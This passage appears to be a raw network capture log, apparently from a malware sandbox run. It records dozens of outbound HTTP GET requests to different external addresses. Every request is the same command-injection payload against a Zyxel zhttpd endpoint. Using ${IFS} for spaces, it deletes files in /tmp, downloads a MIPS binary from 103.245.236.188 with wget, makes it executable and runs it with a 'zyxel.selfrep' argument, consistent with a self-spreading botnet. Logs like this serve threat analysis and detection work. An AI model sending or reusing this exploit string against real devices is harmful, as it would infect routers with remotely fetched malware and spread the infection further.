                                                Jan 12, 2024 18:24:31.739634037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3407192.168.2.133514276.120.58.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739676952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3408192.168.2.1350936155.59.218.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739731073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3409192.168.2.135011640.141.216.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739774942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3410192.168.2.1357454124.140.243.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739810944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3411192.168.2.1355780130.49.113.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739837885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3412192.168.2.135282825.128.63.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739872932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3413192.168.2.1356316115.227.83.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739919901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3414192.168.2.133389470.84.176.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.739981890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3415192.168.2.1349792223.8.56.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740020037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3416192.168.2.1341778177.222.101.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740060091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3417192.168.2.135779090.64.105.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740091085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3418192.168.2.13595449.46.221.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740112066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3419192.168.2.135321893.216.198.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740144014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3420192.168.2.1344804197.179.128.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740170002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3421192.168.2.133893039.3.65.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740212917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3422192.168.2.13545562.124.62.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740236998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3423192.168.2.1348422105.183.42.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740283012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3424192.168.2.135060665.168.37.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740322113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3425192.168.2.134935212.130.129.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740360975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3426192.168.2.1341674199.1.7.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740406036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3427192.168.2.1337806189.225.218.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740442991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3428192.168.2.1351716181.41.59.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740470886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3429192.168.2.1342410155.249.168.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740539074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3430192.168.2.1333872205.110.123.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740570068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3431192.168.2.136015031.137.99.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740593910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3432192.168.2.135949487.10.162.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740644932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3433192.168.2.1342322146.241.57.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740683079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3434192.168.2.1351942192.115.243.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740737915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3435192.168.2.133345657.100.137.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740765095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3436192.168.2.133357661.64.114.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740813017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3437192.168.2.1357880124.30.109.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740845919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3438192.168.2.133639875.42.57.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740895987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3439192.168.2.1337354196.199.26.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740932941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3440192.168.2.1344582177.68.138.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.740968943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3441192.168.2.1360090205.138.216.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741000891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3442192.168.2.1346416213.65.237.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741065025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3443192.168.2.1359038129.92.31.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741117954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3444192.168.2.1340056116.161.110.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741159916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3445192.168.2.1354900199.40.235.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741175890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3446192.168.2.1352400111.152.239.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741214991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3447192.168.2.133347268.178.185.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741223097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3448192.168.2.133401477.254.147.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741265059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3449192.168.2.136050048.90.221.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741309881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3450192.168.2.1347568168.186.64.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741355896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3451192.168.2.1347800191.166.232.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741391897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3452192.168.2.1345754165.31.57.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741431952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3453192.168.2.1355262194.208.158.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741467953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3454192.168.2.1349412129.151.109.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741513014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3455192.168.2.134220846.2.63.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741552114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3456192.168.2.134304266.57.11.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741579056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3457192.168.2.1340716124.248.206.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741622925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3458192.168.2.1339686157.82.145.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741657972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3459192.168.2.1352004198.146.207.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741694927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3460192.168.2.1335726108.52.244.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741715908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3461192.168.2.1342200158.250.217.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741775990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3462192.168.2.1349588152.70.68.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741816044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3463192.168.2.135514469.109.64.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741857052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3464192.168.2.134566086.11.65.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741875887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3465192.168.2.133587684.141.118.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741915941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3466192.168.2.1348700123.242.255.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741952896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3467192.168.2.1346282159.162.88.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.741971970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3468192.168.2.134538461.97.235.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742037058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3469192.168.2.134048664.17.104.44443
                                                TimestampBytes transferredDirectionData
